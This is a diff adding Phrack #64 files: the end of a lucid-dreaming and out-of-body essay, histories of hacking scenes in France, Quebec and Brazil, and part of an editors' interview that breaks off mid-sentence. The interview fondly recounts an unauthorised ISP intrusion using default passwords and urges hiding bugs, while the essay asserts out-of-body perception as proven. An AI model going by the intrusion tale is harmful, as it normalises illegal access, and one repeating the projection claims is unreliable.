+visualizing without moving. It is important to really feel yourself in
+that place. Do not stop whatever you feel or happens. The transition will
+be really quick as I said. Once you suddenly find yourself propelled into
+a dream environment, concentrate on stabilizing your lucidity but touching
+things, watch closely whatever is near you etc. And then . Well, enjoy!
+
+About enjoying, by the way, some might want to trigger sexual fantasies
+in these states. Everything is possible here, remember, and all will
+look as solid as it could. In fact sex is even better most of the times,
+more intense. But climax will bring you back into the waking state,
+and before that you may lose your lucidity as you will get too involved
+into the scenario. There are much more interesting things to do while
+lucid dreaming, but I understand that some want to try different things.
+
+A higher type of projection has been mastered through times by a few
+ones. Originally, it was used by chamans and sorcerers in traditional
+societies to retrieve information on a member of the tribe or the village,
+i.e. his illness, or discover hidden things. This technic is called by
+some out-of-body experience, but I prefer the term physical projection.
+Indeed, although real, lucid dreams stay mostly in a totally subjective
+universe, there are you own creation. But the mind, our consciousness,
+are not limited by the physical boundaries. Crazy? Well everyone thinks
+that before he actually does it. What I am saying here is that it is
+possible to be in the physical world while not inside your physical
+body. How does it work? It is highly debated even amongst those who
+practice this. However, it works, which is the important point here.
+The easiest way to understand this is by trying it by yourself. One
+technic that I developped early in my experimentations with the mind
+was the physical projection initiated from a lucid dream. That.s right,
+a projection of consciousness inside another projection. It is really
+easy so even if you are a full-time skeptic, give it a try. Once you
+become lucid in a dream, following the technics explained hereabove,
+allow yourself to fall backwards without trying to catch oneself. This
+will trigger very powerful sensations, so be prepared to the shock of your
+life, really.  Most of the times, this is what will happend: while falling
+backwards, the image of your dream will disappear as if you were losing
+consciousness in the physical world (it becomes black). A strong feeling
+of being pulled down will appear and you will hear some very loud noises,
+like if you were standing really closely next to an aircraft about to
+take off. It can be quite frightening, but stay focused. You might see
+some bright flashes of light, like being propelled at full speed inside
+a tunnel formed by black clouds during a storm at night. Suddenly,
+you will find yourself floating a few inches above your bed. You will
+most likely feel very weird, and might not see your body, although if
+you try to touch your hands you will feel them, but your body might be
+invisible (or more precisely like the predator in the eponym movie). The
+environment will be strange too: you room will be your physical room,
+but something will feel different. In fact, you will be able to get
+through every object, like a ghost mostly. However the environment will
+also be very permeable to your thoughts, so if you concentrate to see
+something it will appear until you stop to focus.  You will feel very
+different than in any dream, even lucid, and will be in full possession
+of your memory. You should keep your first projection of this type short
+however, in order to keep vivid memories from it. You will soon understand
+first-hand the differences with dreams and how to act in this new state
+of existence. However, be very careful with what you think or do, as
+even if this type of projection is very stable (unlike a lucid dream),
+you can soon be sucked back into a dream-like environment, or your body
+(your might feel tingling sensations in your limbs at this point, and
+have painful areas on your body, but don.t worry). So stay focused.
+A test that many projectors like to do is putting a playing card on
+top of a furniture without looking at it unless they are in a physical
+projection, in order to check it later and confirm the projection. But
+even without that, you will soon be amazed to observe that you can verify
+a lot of what you see in this state. For example, this happened to me
+a few years ago : it was early in the morning and my girlfriend left
+the bedroom, to take a shower or eat her breakfast I thought. However I
+was very tired and soon get back in a very deep relaxed state. I pushed
+my consciousness frontwards and found myself hoavering above my body,
+fully aware. I floated through the room, then through the door, the hall,
+another door, and eventually was in the living room. I was surprised to
+see that my girlfriend was sleeping in a f.tus position on one of the
+sofas, in its left corner, her face against the back and my coat (which
+I had left in the hall) as a blanket. I felt a powerful force sucking me
+back inside my body at this point. I immediately checked what I have seen:
+everything, down to the slightest detail, was correct. This kind of thing
+has happened to me a lot since then.  You do not have to be religious,
+of even believe in life after death to make this experience, just try
+it before you make your own judgement, but give it a try at least.
+
+As you read in the experience I shared just above, I did not project
+physically from within a lucid dream. Indeed you can project from
+full conscious state too, which is even more powerful. If you want to
+learn more about these technichs, I suggest you buy some books about
+this subject, like the trilogy of Robert A. Monroe, a classic written
+during 30 years of experimenting by an electrical ingenieur which found
+himself projecting without even willing it. There are many good books out
+there. However projecting from a fully aware state is much more difficult
+(but feasable of course), so be prepared to spend some time in training
+(usually a conscious projection can be attained in a few days for the
+gifted to a few months for the ungifted, like I was).
+
+It seems that there are higher states of projection, apparently in some
+all-mental levels, but in an objective, all-mental, universe. I have
+yet to get into these, but hopefully some of you will get there in a
+few years. Let the community of projectors of consciousness know your
+discoveries at this time, as it is all about sharing. Indeed, projecting
+your consciousness is even more than a life-changing experience, it is
+a matter of protecting your freedom, your freedom to exist as a mind and
+a body, and to use both to their extreme limits, and even beyond. Noone
+can take that from you, even locked into the smallest and deepest prison
+of all. It is not even about believing, it is about trying by yourself
+to push your limits out of the ordinary, out of the known into mostly
+or fully unknown territories, and discover your true nature doing so.
+
+See you in other levels of consciousness.
+
+K.
diff --git a/phrack64/17.txt b/phrack64/17.txt
new file mode 100644
index 0000000..ddb60af
--- /dev/null
+++ b/phrack64/17.txt
@@ -0,0 +1,387 @@
+              _                                                _
+            _/B\_                                            _/W\_
+            (* *)             Phrack #64 file 15             (* *)
+            | - |                                            | - |
+            |   |            International scenes            |   |
+            |   |                                            |   |
+            |   |                 By Various                 |   |
+            |   |                                            |   |
+            |   |               various@nsa.gov              |   |
+            (____________________________________________________)
+
+
+More or less 10 years after the last "International scenes" in
+phrack 48, the resurrection arrives. The purpose of this article
+is to present you hacking/cracking/phreaking scenes of different 
+countries. This article is not writen by a single people but by 
+people from all these differents counties. It's why we ask you 
+to send us descriptions of your scenes. It could be about groups,
+busts, technologies, great hackers or anything you think is 
+interesting. 
+
+                 -----------------------------
+
+There was once a time when hackers were basically isolated.  It was
+almost unheard of to run into hackers from countries other than the
+United States.  Then in the mid 1980's thanks largely to the
+existence of chat systems accessible through X.25 networks like
+Altger, tchh and QSD, hackers world-wide began to run into each other.
+They began to talk, trade information, and learn from each other.
+Separate and diverse subcultures began to merge into one collective
+scene and has brought us the hacking subculture we know today.  A
+subculture that knows no borders, one whose denizens share the common 
+goal of liberating information from its corporate shackles.
+
+With the incredible proliferation of the Internet around the globe, this
+group is growing by leaps and bounds.  With this in mind, we want to help
+further unite the communities in various countries by shedding light
+onto the hacking scenes that exist there.  If you want to contribute a
+file about the hacking scene in your country, please send it to us
+at phrack@well.com.
+
+This month we have files about the scenes in France, Quebec and Bazil.
+
+---------------------------------------------------------------
+
+A personal view of the french underground [1992-2007]
++++++++++++++++++++++++++++++++++++++++++++++++++++++
+
+by Nicholas Ankara
+
+The french scene has evolved a lot since years 1980'. Before 1993, there
+was no internet provider in France, which explain why the hacking scene
+in France has been mostly focused on phreaking and hardware-related
+hacking before this date. The first ISP (Worldnet) was founded by an
+influent hacker so-called NeurAlien. I am not sure that his identity
+was of public knowledge at this time, but I dont think Im taking too
+many risks by revealing this.
+
+NeurAlien was also the founder of what is known to be the first electronic
+french ezine about hacking, widely reknown as NoWay. NoWay started to be
+published in 1992 and did not deal so much with Internet Hacking, but
+more about the hacking on the MiniTel network. MiniTel is the ancestor
+of the Internet in France, and its use seems to have justified the late
+of using the Internet in this country. However, MiniTel was extremely
+slow and expensive, which incitated a wide amount of hacking to be
+developped around this. NeurAlien wrote at that time many philes about
+minitel hacking, most of them published in NoWay. He also participated
+in the writing of an International Scene article in Phrack #46 where he
+explained the early hacking movement in France.
+
+NoWay inspired a lot of french hackers in the 90' and many other ezine,
+such as NoRoute, were born after NoWay stopped publication, around
+1994. NoRoute was (afaik) the first french ezine dealing with Internet
+hacking as a main topic. Unlike NoWay, NoRoute was done by multiple
+authors, who confirmed to be highly-skilled hackers in the future,
+since some of them founded one of the most influent international hacking
+group in the 90', known as ADM (Association De Malfaiteurs, that could be
+translated to 'Criminals Association'). That same group, under additional
+influences, gave a new life to the antisecurity movement in the early
+2000, by creating public web forums to justify the non-disclosure of
+exploit software.
+
+Affiliated to these peoples, another old school hacker named Larsen
+pioneered Radio Hacking in France. Larsen founded the CRCF (Chaos
+Radio Club of France), whoose research was compiled into an ezine
+called HVU. HVU gave lots of information about frequencies used by
+various services in France, including the police and other military
+groups of the country.  Unfortunately, Larsen got busted later on, as
+he was getting out of his home in bicycle, by weaponed authorities who
+considered him as a terrorist, while he was just a happy hacker making
+no profit from his research. After this episode, it got more difficult
+for him to continue underground activities related to this topic, more
+precisely it was way more difficult to publish about it with the treat
+of a new so-called antiterrorist raid. This story reflects without any
+doubt the total incomprehension between hackers and national services of
+the country. It is more and more difficult to find contacts in publicly
+known meeting such as the 2600-fr which happens in Paris every month
+because of these reasons.
+
+Another major underground ezine that demarked itself by its technical
+quality was so called MJ13 (Majestic13). It was mostly written by french
+hackers, also students in reknown french computer universities. MJ13
+contained material about virii, cracking, hardware hacking, and other
+related topics, but ceased publication after only 4 issues. There
+were also attempt to group hackers for legal reasons (as in creating
+a syndicate of hackers somehow) by the Hacker Emergency Response Team
+(HERT) founded by Gaius. Gaius (ACZ) was a french hacker of the early
+90' reknown for his social engineering hacks into FBI and CIA telephone
+network. Surprisingly, he never got jailed but at some point he had to
+move from the country, officially to escape authorities.  HERT was never
+a hacking group but included a lot of hackers from other international
+groups such as ADM, w00w00, TESO, and others.
+
+As already stated, a major burden that always made the french hacking
+scene to suffer was the omnipresence of the french secret service
+(DST: Direction de la Surveillance du Territoire) and their voluntee
+to infiltrate the french hacking scene by any mean. A good example of
+this was the fake hacking meeting created in the middle 1990' so called
+the CCCF (Chaos Computer Club France) where a lot of hackers got busted
+under the active participation of a renegate hacker so called Jean-Bernard
+Condat. Since that time, the french hacking was deeply armed and a very
+suspectful ambiant spirit is regning for more than 10 years. Most of the
+old school hackers decided to stop contributing to the scene, which went
+even more underground, to avoid infiltration of services.
+
+As the Internet was getting democratized in the late 90', a new generation
+of hackers, ignorant of what happened with the CCCF, started to recreate
+a public face for the french hacking scene, and new phreaking and hacking
+groups started to create new influential ezines. The most reknown new
+school phreaking ezine was called Cryptel but had to cease publication
+because of major busting at the beginning of 2000' . A lot of other ezines
+were born from unexperienced hackers but mots of them were ripped from
+existing material, or brang a very poor technical quality, which made
+them not worth mentioning any further.
+
+During the late 90' / early 2000, other groups such as RTC created
+an ezine which dealt mostly with network oriented hacking, but ceased
+publications after a few issues. Another group was created under the
+name Exile, which grouped french, canadians, and belgians young hackers.
+This group started as unexperienced but soon got quite a reputation
+by writing a lot of highly technical articles for various ezines such
+as the canadian quebecer magazine IGA, and later into Phrack. As the
+group evolved into another one under the name Devhell, their articles
+about new techniques of exploits, reverse engineering, never got into
+a dedicated ezine.  There was once an attempt to create such an ezine
+but the difficulties of finding serious collaborators made it impossible.
+
+Last but not least, an international group of (partly french)
+highly-skilled hackers was created at the beginning of years 2000 also
+known as Synnergy Networks. This group got very known by publishing
+exploit software that were seemingly very hard to write (such as the first
+publications of heap overflow exploits) and writing references articles
+about the subject, some of them being published in Phrack Magazine. Just
+as other mentioned groups, it is very hard for a non-hacker to know
+if those groups are still in activity because of their closed-door
+nature by default and the absence of any up-to-date information on the
+web about them. It is safer for everyone serious about hacking to stay
+low-profile to avoid miscellanous troubles and keep the necessary freedom
+on performed activities. Nevertheless, it can be mentioned without fear
+that hacking is not closed to a given group, and the most active hackers
+in each group got in collaboration at some point to create a stronger
+manpower in order to face the merchandization of computer security and
+the increasing difficulty of succesfull computer networks intrusions.
+
+The french underground is also very active in the field of software
+cracking and many very skilled french crackers are still in activity. Just
+as their hackers alter-egos, french crackers learnt to stay very paranoid
+about their activities to avoid busting, and for this reason I will not
+mention any names of group or persons active on that topic. Actually I may
+be able to quote only one young group of reverse engineers who slightly
+overlap with the cracking community : the French Reverse Engineering Team
+(FRET). FRET holds a public forum on the topic of reverse engineering
+and none of their activities appear to be illegal. This forum stands
+for an educational place for the young generation of coders to learn
+low-level information about closed-source software.
+
+There were also a lot of other groups but I would not define them
+as hacking groups, as most of them were created by beginners or
+profit-oriented associations for other reasons than fun with hacking.
+Generally, those groups did not help to renew the hacking underground
+mindset and thus do not have a place in a file about the french
+underground history. The underground exists and remain very active. It is
+up to each hacker to enter the underground by providing material to other
+hackers.  Hacking is not about disclosure of exploits or fame-seeking
+on public forums or mailing lists. It is about having fun by learning
+what you are not supposed to learn. Because of this, the underground
+will always exist, even if no trace of it remains on the WWW.
+
+
+--------------------------------------------------------------
+
+                        The Quebec scene
+                        ================
+                             by g463
+
+Yesterday ...
+-------------
+
+NPC (Northern Phun Co.) is believed to be the first hacking and phreaking
+group in the history of the Quebec scene.  One of their member, known as
+Gurney Halleck, has already wrote on the 418 scene in the "International
+scenes" article in Phrack 44.  NPC has released a bunch of good quality
+ezines back in 1992 to 1994 about phreaking, hacking and anarchy.
+
+Active around 1994 to 1997, the second big hacking and phreaking group was
+C-A (Corruption Addicts).  This group was pretty active back then and they
+had the reputation to do some blackhat activities.  They have hacked high
+profile organizations, such as the GRC, FBI, SCRS, DND and 11 banks, like
+the National Bank of Canada.
+
+After C-A dissolved, two other groups took the lead of the Quebec scene
+around 1995, Total Control and FrHack.  Both published a couple of ezines.
+Then, around 1998, these groups left the scene, and at the same time they
+made room for Pyrofreak and IGA.
+
+In 2000, there was the reborn of sector_x.  The goal of this group was to
+bring the best hackers that the province of Quebec had to offer under the
+same roof.  The idea was great, but ultimately, it failed.  There were a
+lot of really good conversations and interesting exchanges between people,
+but there were no concrete and constructive projects at all.  In fact, this
+was always one of the major problem of the Quebec scene ...
+
+
+... Today
+---------
+
+Today, the Quebec scene still exists even tough it has changed a lot during
+the last years.  The rapid growth of the Internet has made meeting people a
+lot easier than before, and it helped the community to grow larger.
+Consequently, a lot of people , such as computer geeks, adepts of
+technology, gamers and web programmers began to hang around hacker groups.
+As of today, there is still a couple of hackers left in the dark corners of
+the Quebec scene, but you need to scratch the surface a little bit to find
+them ...
+
+Mindkind is one of the only hacking group that still releases ezines on a
+regular basis.  They have their own particular style of writing, that could
+be defined as eccentric and delirious.  To date, they have published 10
+ezines, talking about different subjects such as phreaking, hacking and
+philosophy.  Through the years, many people joined this group and a lot
+have left also, but there is still the same group of fanatics that remains
+to keep the group alive.
+
+The new millennium has also brought a lot of meetings, conventions and get
+together.  Among those events, there were the Hackfests, organized by the
+Centinel.  Hackfests are conventions on hacking that last a full weekend
+and they are hosted at University Laval, in Quebec city.  A few dozens of
+hackers meet during this time to hack, learn and of course party.  On the
+schedule, there are various activities, such as hacking contests,
+conferences and wargames, with a nice music ambiance provided by the
+31337radio internet talk show.
+
+The 2600 group has also its meetings in Montreal.  Each first Friday of
+every month, a small group of computer freaks meet downtown Montreal to
+talk about different subjects such as computers and electronics.  Among
+those conversations, you can sometimes ear some interesting discussions
+about computer security.
+
+There is also the famous reverse engineering conference better known as
+Recon that takes place in Montreal.  This event is organized by three
+Quebecers, passionate about reverse engineering and security.  This
+conference had a lot of good and highly skilled speakers in the past.  The
+next conference is planned for the year of 2008.
+
+Finally, since a couple of years, the corporate world has changed a lot of
+things in the Quebec scene.  Now, some hackers are getting paid to do what
+they love to do.  Consequently, this movement altered the motivation of a
+lot of hackers over time.  I still think it's possible to stay true to your
+roots even if you earn your living this way, but too many people are
+getting corrupted by the money.  Also, a lot of opportunists, with
+absolutely no knowledge of hacking and security, are attracted by the easy
+money you can do in the corporate world of the security, but this is
+another story ...
+
+
+Busts
+-----
+
+To my knowledge, one of the first bust to happen in Quebec was back in
+April 1993.  Coaxial Karma, from NPC, was arrested for hacking into a
+VAX/VMS cluster of University Laval.  He did his prowess by brute forcing
+usernames and passwords.  Then, an administrator saw the logs by chance,
+and called the police.  Since he was a juvenile at that time, he got by
+quite easily.
+
+June 8th 1998, three members of C-A got arrested.  They got charged with
+possession of password lists, possession of bomb recipes and hacking.  Two
+people got away with it, but phaust, the founder of the group, was
+sentenced to 12 months of community service and placed on probation for 12
+months.
+
+Back in February 2000, one of the most publicized denial of service attack
+happened.  I don't think it's an exploit that the Quebec scene needs to
+remember, but it's still something important that needs to be talked about.
+Mafiaboy was the individual who performed those denial of services attacks
+against high profile corporations such as Yahoo, Amazon, Dell, eBay and
+CNN.  After bragging about it on IRC, he got the attention of the
+authorities.  In September 2001, he was sentenced to eight months of open
+custody, one year of probation, restricted use of Internet and a small
+fine.
+
+----------------------------------------------------------------------
+
+PHRACK INTERNATIONAL SCENE ON BRAZIL
+by sandimas
+
+Since last 'Phrack International Scene on Brazil', over than a
+decade ago, there were lots of changes on the hacking subject
+in 'coconut land'. Here is a very brief historical retrospective
+on the evolution of brazilian hacker scene.
+
+[ -- The initial mark
+
+Back on that time Internet access in Brazil was somewhat restrict
+only to academicists or rich people. The BBS scene was quite popular
+and still existed. The very begining of the scene was developed on
+this environment, although there is a few information and
+documentation about this time.
+
+In 1995 when Embratel (our AT&T) authorized commercial access
+to the net, there was the kickstart of an rehearsal to a more robust
+hacker scene. In this same year the first brazilian hacking e-zine
+called Barata Eletrica appeared, although being lame it can be
+considered the real initial mark of the scene in Brazil.
+
+[ -- Heading to a more robust scene
+
+In subsequent years, due to lower prices of equipments, there was
+a significant expansion of hacking in the country. Many people and
+groups got united altogheter to exchange knowledge and spread it
+through many e-zines. Although not all publications were that good
+and hackers were not that skilled, these people helped out to pave
+the road to an even large scene. It was the most active time
+brazilian hacking has ever seen.
+
+[ -- 1999: The rise of the script-kiddies
+
+At the end of 90's hacking achieved a "pop" status in Brazil. Being
+a hacker was "cool". Without much knowledge you could brag and boast
+to your friends and impress chicks. With half-dozen public exploits
+you could break into computers belonging to the government and other
+high-profile targets. The (always) uniformed media gave so much
+attention to these 'hackers' and because of this it was easy to have
+your nickname on the most-watched tv news or major newspapers and
+magazines.
+
+This banalization drawed attetion of the authorities and anti-hacking
+laws were built but they never got through. And, going with the flow,
+many computer security firms were created. Some kids who had grown up
+from the early underground scene went corporate and created their own
+companies. But also there are many other companies that took advantage
+of the fear spread by the media and increased their stock market shares
+by selling lies and offering snake-oil consultancy.
+
+Needless to say in this Dark Ages few or none worthwhile knowledge was
+produced and published to the national scene.
+
+[ -- ...and everything after
+
+Just like after the Dark Ages, we also had our Ages of Englightment,
+shedding a light at the brazilian scene. New groups and a bunch of new
+people and mailing lists committed themselves to study and experiment
+new horizons of computing were formed, quite good papers and tutorials
+in portuguese were published and a scene seemed to be flourishing again,
+even with strange highs and strange lows.
+
+After a few years of almost nothing interesting occurring here we had
+Hackers 2 Hackers Conference I in 2004, the very first hacker conference
+held in Brazil. H2HC is now moving toward its fourth edition and getting
+better every year.
+
+Currently in Brazil we have two or three well known teams and a bunch of
+skilled people getting along in close-knit circles. We also have two active
+e-zines, MOTD Guide, aimed to beginners, and The Bug! Magazine, with more
+sophisticated articles and oriented to people with medium level skills.
+
+[ -- Few words about phone phreaking in coconut land
+
+There is no phreaking in Brazil. Period. In late 90's we had only two
+serious groups, a few hangers-on who used to blue box, a guy called Tom
+Waits and a magazine called Brazilian Phreakers Journal dedicated to
+phone phreaking but they are dead and gone now.
+
+Apart from some tricks to make free phone calls and calling card abuse,
+there seems to be no real phreaking here. Our phone system has been kept
+secret for many years and no one really understands it deeply.
+
diff --git a/phrack64/2.txt b/phrack64/2.txt
new file mode 100644
index 0000000..ecf9bd5
--- /dev/null
+++ b/phrack64/2.txt
@@ -0,0 +1,323 @@
+             _                                                _
+            _/B\_                                            _/W\_
+            (* *)             Phrack #64 file 2              (* *)
+            | - |                                            | - |
+            |   |              Phrack Pro-Phile              |   |
+            |   |                                            |   |
+            |   |        By The Circle of Lost Hackers       |   |
+            |   |                                            |   |
+            |   |                                            |   |
+            (____________________________________________________)
+
+
+Welcome to Phrack Pro-Phile. Phrack Pro-Phile is created to bring
+info to you, the users, about old and highly important controversial
+peoples. The first Phrack Pro-Phile was created in Phrack Issue 4 by
+Taran King. Since this date, a total of 43 profile were realized. Some
+well know hackers were profiled like Taran King, The Mentor,
+Knigh Lighting, Lex Luthor, Emmanuel Goldstein, Erik Bloodaxe,
+Control-C, Mudge, Aleph-One, Route, Voyager, Horizon or more
+recently Scut.
+
+This prophile is probably a little more different since it will introduce
+the new staff. Since the people composing The Circle of Lost Hackers
+want to stay anonymous, the Prophile will be more a "question-answer"
+prophile.
+
+
+--------------------------------------------------------------------------
+
+Personal
+--------
+
+Handle: The Circle of Lost Hackers
+Call them: call them what you want, just be careful
+Handle Origin: Dead Poets Society movie
+Date of Birth: from 1977 to 1984
+Age at current date: haha
+Countries of origin: America, South-America and Europe
+
+-------------------------------------------------------------------
+
+Favorite Things
+---------------
+
+Women    : Angelina Jolie because she was a great hacker in a movie
+Cars     : Like everyone, the Dolorean. The only nice car in the 
+           world.
+Foods    : Italian food is without a doubt the best food. Some other
+           prefer Chinese or Japanese once they tasted Yakitori's.
+Alcohols : anything which make you drunk
+Drugs    : sex
+Music    : Drum and Bass, Sublime, Orbital, Red Hot Chili Peppers, DJ 
+           Shadow, The Chemical Brothers, The Mars Volta, more generally 
+           death metal, and gothic rock. Abstract electro bands like 
+           Boards of Canada.
+Movies   : Blade Runner, The Usual Suspect, Fight Club, Kill Bill,  
+           hackers (private joke)
+Authors  : Gurdjieff, Rufolf Steiner, Rupert Sheldrake, Plato, Stephan
+           Hawkings, Roger Penrose, George Orwell, Noam Chomsky,
+           Sun Tzu, Nicolas Tesla, Douglas Hofstadter, Ernesto Guevara,
+           Daniel Pennac, Gabriele Romagnoli  
+
+----------------------------------------------------------------------------
+
+Open Interview
+--------------
+
+Q: Hello
+A: Saluto amigo!
+
+Q: Can you introduce yourselves in a few words?
+A: The Circle of Lost Hackers is a group of friends overall. Two years 
+   ago when TESO decided to stop Phrack, the voice of the underground  
+   decided not to let Phrack dying. People started to wonder .. Phrack is
+   really dead ? In no way it is. Phrack reborns, always, from the 
+   influence of multiple hacking crews to make this possible. But at the 
+   beginning it was not easy to create a new team, a lot of people agreed 
+   to continue Phrack but not really to write or review articles. Also, 
+   one of the most important thing was to have people with the good 
+   spirit. Now we think that we have a good team and we hope bring to the 
+   Underground scene a lot of quality papers like in old issues of Phrack,
+   but keeping the technical touch that makes Phrack a unique hacking 
+   magazine. The Phrack staff evolves and will always evoluate a new 
+   talents get interested in sharing for fun and free information.
+
+Q: How many people are composing The Circle of Lost Hackers?
+A: We could tell you, but we would have to kill you, after. The only
+   important thing is that  "The Circle of Lost Hackers" is not a
+   restricted club. More people will join us, others may leave, depending
+   on who really believes in comunication, hacking and freedom of research
+   and information. 
+
+
+Q: When did you start to play with computers and to learn hacking?
+A: Each one of us could answer differently. There's not a "perfect" age to
+   start, neither it is ever too late to start. Hacking is researching. It
+   is being so obstinated on resolving and understanding things to spend
+   nights over a code, a vulnerability, an electronic device, an idea. 
+
+   Hacking is something you have inside, maybe you'll never take a
+   computer or write a code, but if you've an "hacking mind" it will
+   reveal itself, sooner or later. 
+
+   To give you an idea of the first computers of some members of the
+   team, it was a 286, 486 SX or an Amiga 1000. Each of us started
+   to play with computer at the end of 80' or beginning of 90'. The
+   hacking life of our team started more or less around 97. Like with
+   a lot of people, Phrack and 2600 mag were and are a great source of 
+   inspiration, as well as IRC and reading source code.
+
+
+Q: This interview is quite strange, you do the questions and the
+   answers at the same time ?!?!
+A: What's the problem, in phrack issue 20 Taran King did a prophile
+   of himself!!!
+
+
+Q: Can you tell us what is your most memorable experience?
+A: Each of us has a lot of memorable experiences but we don't really have
+   a common experience where we hacked all together. So to make easy we 
+   are going to take three of our "memorable" experiences.
+       
+   1.
+   A subtle modification about p0f wich made me finding documents 
+   that I wasn't supposed to find. Some years ago, I had a period when 
+   each month I tried to focus on the security of one country. One of
+   those countries was South-Korea where I owned a big ISP. After 
+   spending some time to figure out how I could leave the DMZ and enter
+   in the LAN, I succeed thanks to a cisco modification (I like
+   default passwords). Once in the LAN and after hiding my activity
+   (userland > kernelland), I installed a slightly modification of
+   p0f. The purpose if this version was to scan automatically all 
+   the windows box found on the network, mount shared folders and 
+   list all files in these folders. Nothing fantastic. But one of 
+   the computers scanned contained a lot of files about the other
+   Korea... North Korea. And trust me, there were files that I
+   wasn't supposed to find. I couldn't believe it. I could do the 
+   evil guy and try to sell these files for money, but I had (and 
+   I still have) a hacker ethic. So I simply added a text file on 
+   the desktop to warn the user of the "flaw". After that I left 
+   the network and I didn't come back. It was more than 5 years 
+   ago so don't ask me the name of the ISP I can't remember.
+
+   2. 
+   Learning hacking by practice with some of the best hackers world-wide.
+   Sometimes you think you know something but its almost always possible 
+   to find someone who prove you the opposite. Wether we talk about 
+   hacking a very big network with many thousands of accounts and know 
+   exactly how to handle this in minuts in the stealthiest manner, or 
+   about auditing source code and find vulnerability in a daemon server or
+   Operating System used by millions of peoples on the planet, there is 
+   always someone to find that outsmart you, when you thought being one of
+   the best in what you are doing. I do not want to enter in detail to 
+   avoid compromising anyone's integrity, but the best experience are 
+   those made of small groups (3, 4 ..) of hackers, working on something 
+   in common (hacking, exploits, coding, audits ..), for example in a 
+   screen session. Learning by seing the others do. Teaching younger 
+   hackers. Sharing knowledge in a very restricted personal area.
+   Partying in private with hackers from all around the world and getting 
+   0day found, coded, and used in a single hacking session. 
+
+
+Q: Is one of you has been busted in a previous life?
+A: Hope no but who knows?
+
+
+Q: What do you think about the current scene?
+A: We think a lot of things, probably the best answer is to read the
+   article "A brief history of the Underground" in this issue where 
+   we are talking about the scene and the Underground.
+
+   
+Q: What's your opinion about old phracks?
+A: Great. Old phracks were the first source of information when we were
+   starving for more to learn. _The_ point of reference. But don't stop
+   yourselves to the last 10 issues, all issues are still interesting.
+
+
+Q: And about PHC?
+A: Well, thats an interesting question. To be honest, PHC did not just do
+   those bad things we were used to learn from the web or irc, we like some
+   of them and even know very well a few others. Also, the two attempted 
+   issues 62 and 63 of PHC had an incontestable renew in the spirit and 
+   there were even some useful information on honeypots and protecting 
+   exploits. 
+
+   However, we have a problem with unjustified arrogance. If it's true 
+   the security world has a problem with white/black hats, we think that 
+   the good way to resolve the problem is not to fight everyone, 
+   especially such a poor demonstrative way. It's not our conception of 
+   hacking. Take the first 20 issues of Phrack and try to find unjustified
+   arrogant word/sentence/paragraph: you won't find any. The essence of 
+   hacking is different : it's learning. Hacking to learn. 
+
+   You can be a blackhat and working in the IT industry, it's
+   not incompatible. We have nothing against PHC and we think the
+   Underground needs a group like PHC. But the Underground needs a magazine
+   like Phrack as well. The main battle of PHC is fighting whitehats but
+   it's not Phrack's battle. It's never been the purpose of Phrack. 
+   If we have to fight against something, it's against the society and 
+   not targeting whitehats personally (that doesn't mean that we support 
+   whitehat...). Phrack is about fighting the society by releasing 
+   information about technologies that we are not supposed to learn. And 
+   these technologies are not only Unix-related and/or software 
+   vulnerabilities.
+
+   We agree with them when they say that recent issues of Phrack helped 
+   probably too much the security industry and that there was a lack of 
+   spirit. We're doing our best to change it. But we still need technical 
+   articles. If they want to change something in the Underground, they are 
+   welcome to contribute to Phrack. Like everyone in the Underground 
+   community.
+
+
+Q: Full-disclosure or non-disclosure? 
+A: Semi-disclosure. For us, obviously. Free exchange of techniques, ideas
+   and codes, but not ready-to-use exploit, neither ready-to-patch
+   vulnerabilities.
+
+   Keep your bugs for yourself and for your friend, do the best to not
+   make them leak. If you're cool enough, you'll find many and you'll be
+   able to patch your boxes.
+
+   Disclosing techniques, ideas and codes implementations helps the other
+   Hackers in their work, disclosing bugs or releasing "0-day" exploits
+   helps only the Security Industry and the script kiddies.
+   And we don't want that.
+
+   You might be an Admin, you might be thinking : "oh, but my box is not
+   safe if i don't know about vulnerabilities". That's true, but remember
+   that if only very skilled hackers have a bug you won't have to face a
+   "rm -rf" of the box or a web defacement. That's kiddies game, not
+   Hackers one.
+
+   But that's our opinion. You might have a totally different one and we
+   will respect it. You might even want to release a totally unknown bug
+   on Phrack's pages and, if you write a good article, we'll help you in
+   publishing it. Maybe discussing the idea, before.
+
+   As we said in the introduction, the first thing we want to garantee
+   is freedom of speech. That's the identity of our journal.
+
+
+Q: What's the best advice that you can give to new generation of hackers?
+A: First of all, enjoy hacking. Don't do that for fame or to earn more
+   money, neither to impress girl (hint: not always works ;)) or only to
+   be published somewhere. Hack for yourself, hack for your interest, hack
+   to learn. 
+
+   Second, be careful. In every thing you do, in any relationship you'll
+   have. Respect people and try to not distrupt their work only because
+   you're distracted or angry. 
+
+   Third, have fun. Have a lot of fun.
+
+   And never, never, never setup an honeypot (hi Lance!).
+
+
+Q: What do you think about starting an Underground World Revolution
+   Movement against the establishment ?
+A: Do it. But do it Underground. The nowadays world is too obsessed by
+   "visibility". Act, let the others talk.
+
+
+Q: What's the future of hacking ?
+A: The future is similar to the present and to the past. "Hacking" is the
+   resulting mix of curiosity and research for information, fun and 
+   freedom. Things change, security evolves and so does technology, but the
+   "hacker-mind" is always the same. There will always be hackers, that is
+   skilled people who wants to understand how things really go.
+
+   To be more concrete, we think that the near future will see way more
+   interest in hardware and embedded systems hacking : hardware chip
+   modification to circumvent hardware based restrictions, mobile and
+   mobile services exploits/attacks, etc.
+   
+   Moreover, seems like more people is hacking for money (or, at least,
+   that's more "publicly" known), selling exploits or backdoors. Money is
+   usually the source of many evils. It is indeed a good motivating factor
+   (moreover hacking requires time and having that time payed when you
+   don't have any other work is really helpful), but money brings with
+   itself the business mind. People who pays hackers aren't interested in
+   research, they are interested in business. They don't want to pay for
+   months of research that lead to a complex and eleet tecnique, they want
+   a simple php bug to break into other companies website and change the
+   homepage. They want visible impact, not evolved culture. 
+
+   We're not for the "hacking-business" idea, you probably realized that.
+   We're not for exploit disclosure too, unless the bug is already known
+   since time and showing the exploit code would let better understand the
+   coding techniques involved. And we don't want that someone with a lot of
+   money (read : governement and big companies) will be one day able to
+   "pay" (and thus "buy") all the hackers around. 
+
+   But we're sure that that will never happen, thanks to the underground,
+   thanks to people like you who read phrack, learn, create and hack
+   independently.
+
+
+
+Q: Do you have some people or groups to mention ?
+A: (mentioning some people and say what do u thing about them, phc, etc)
+  
+   There are groups and people who have made (or are making) the effective
+   evolving of the scene. We try to tell a bit of their story in
+   "International Scenes" phile (starting from that issue with : Quebec, 
+   Brazil and France). Each country has its story, Italy has s0ftpj 
+   and antifork, Germany has TESO, THC and Phenolit (thanks for your great 
+   ph-neutral party), Russia, France, Netherlands, or Belgium have ADM, 
